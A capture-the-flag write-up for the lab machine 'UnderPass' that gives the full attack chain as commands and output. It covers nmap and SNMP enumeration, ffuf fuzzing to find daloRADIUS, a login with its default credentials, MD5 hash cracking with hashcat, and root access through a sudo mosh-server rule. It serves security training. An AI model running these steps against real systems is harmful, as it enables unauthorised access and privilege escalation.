Skip to content

UnderPass

Enumeration

Nmap scan of the target:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
$ nmap -sV -sC -PN -p- -oA underpass_nmap 10.10.11.48
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-10 16:39 CEST
Nmap scan report for 10.10.11.48
Host is up (0.047s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
|_  256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Repeated the same for common UDP ports and found an SNMP server running on port 161:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
$ sudo nmap -sV -sC -PN -sU -p 53,69,161,162,10161,10162,623 10.10.11.48
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-10 16:41 CEST
Nmap scan report for 10.10.11.48
Host is up (0.029s latency).

PORT      STATE  SERVICE       VERSION
53/udp    closed domain
69/udp    closed tftp
161/udp   open   snmp          SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: c7ad5c4856d1cf6600000000
|   snmpEngineBoots: 31
|_  snmpEngineTime: 3m26s
| snmp-sysdescr: Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
|_  System uptime: 3m26.53s (20653 timeticks)
162/udp   closed snmptrap
623/udp   closed asf-rmcp
10161/udp closed snmpdtls
10162/udp closed snmpdtls-trap
Service Info: Host: UnDerPass.htb is the only daloradius server in the basin!

The web server on port 80 doesn't appear to be configured and only presents the default Apache2 page:

alt text

Attempted to fuzz the site with FFuF to uncover any unexpected files or directories, but found none.

False positive

Any file ending in .phps is reported as a HTTP 403 error. For instance, the file wp-forum.phps appears in the web root:

1
2
3
4
$ ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -u http://underpass.htb/FUZZ
...
wp-forum.phps           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 25ms]
...

Navigating to the URL in a web browser works and also returns a HTTP 403 error. However, with no other traces of WordPress, this is just a false positive.

The SNMP service can be enumerated using snmpwalk:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
$ snmpwalk -v2c -c public underpass.htb
iso.3.6.1.2.1.1.1.0 = STRING: "Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (311329) 0:51:53.29
iso.3.6.1.2.1.1.4.0 = STRING: "steve@underpass.htb"
iso.3.6.1.2.1.1.5.0 = STRING: "UnDerPass.htb is the only daloradius server in the basin!"
iso.3.6.1.2.1.1.6.0 = STRING: "Nevada, U.S.A. but not Vegas"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (1) 0:00:00.01
...

The SNMP tree on the host is pretty small. The lines above are more or less the only ones of interest. The highlighted line is somewhat cryptic, but it contains valuable details:

  • The capialized letters in the doman name make out the acronym UDP.
  • the only daloradius server hints at there being a daloRADIUS instance on the host.

RADIUS is an authentication protocol that runs on ports 1812/UDP and 1813/UDP:

1
2
3
4
$ nc -vu underpass.htb 1812
Connection to underpass.htb (10.10.11.48) 1812 port [udp/radius] succeeded!
$ nc -vu underpass.htb 1813
Connection to underpass.htb (10.10.11.48) 1813 port [udp/radius-acct] succeeded!

It seems the target is a RADIUS server.

Taking a somewhat educated guess, the daloRADIUS web application might be running under /daloradius on the web server:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
$ curl -L underpass.htb/daloradius
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Apache/2.4.52 (Ubuntu) Server at underpass.htb Port 80</address>
</body></html>

It's not non-existent, so there might be other files and directories hidden in the /daloradius subdirectory that could be useful.

Used FFuF to discover additional files and directories under /daloradius:

1
2
3
4
$ ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -u http://underpass.htb/daloradius/FUZZ
...
.gitignore              [Status: 200, Size: 221, Words: 1, Lines: 13, Duration: 26ms]
ChangeLog               [Status: 200, Size: 24703, Words: 3653, Lines: 413, Duration: 26ms]

The .gitignore suggests that the /daloradius subdirectory is a cloned Git repository. Which repository it is, is clear by the contents of ChangeLog, which matches exactly with the ChangeLog file from the official daloRADIUS repository:

alt text

Using the daloRADIUS repository as a guide, there should be two separate login frontends for users and operators. Of course, the operator login is the more interesting one of the two:

alt text

Foothold

The default credentials (administrator:radius) from the daloRADIUS documentation are valid for logging in to the daloRADIUS web UI:

alt text

The dashboard lists a single user, svcMosh, with a corresponding MD5 hashed password:

alt text

Cracked the hash using Hashcat in mode 0:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
$ hashcat -m 0 svcmosh.hash ~/tools/wordlists/rockyou.txt
...
412dd4759978acfcc81deab01b382403:underwaterfriends

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: 412dd4759978acfcc81deab01b382403
Time.Started.....: Sat May 10 19:10:12 2025 (1 sec)
Time.Estimated...: Sat May 10 19:10:13 2025 (0 secs)
...

User svcMosh appears to be a system user account and the credentials (svcMosh:underwaterfriends) are valid for logging in over SSH:

1
2
svcMosh@underpass:~$ id
uid=1002(svcMosh) gid=1002(svcMosh) groups=1002(svcMosh)

Got the user flag.

Privilege Escalation

User svcMosh has a Sudo NOPASSWD privilege on /usr/bin/mosh-server:

1
2
3
4
svcMosh@underpass:~$ sudo -l
...
User svcMosh may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/bin/mosh-server

mosh-server is a server-side application for Mosh, a remote terminal application.

When executed, mosh-server starts listening on a high-numbered UDP port and provides a key for connecting. While this normally doesn't require root privileges, the way it's set up on the host creates an opportunity for privilege escalation.

The method is described here. Essentially, it involves standing up a mosh-server instance as root and then using mosh-client to connect to the instance on localhost:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
svcMosh@underpass:~$ sudo /usr/bin/mosh-server new


MOSH CONNECT 60001 NVNlc0zGj9E0A1tkegix4A

mosh-server (mosh 1.3.2) [build mosh 1.3.2]
...

[mosh-server detached, pid = 2722]
svcMosh@underpass:~$ MOSH_KEY=NVNlc0zGj9E0A1tkegix4A mosh-client 60001
mosh-client (mosh 1.3.2) [build mosh 1.3.2]
...
root@underpass:~# id
uid=0(root) gid=0(root) groups=0(root)

Got the root flag.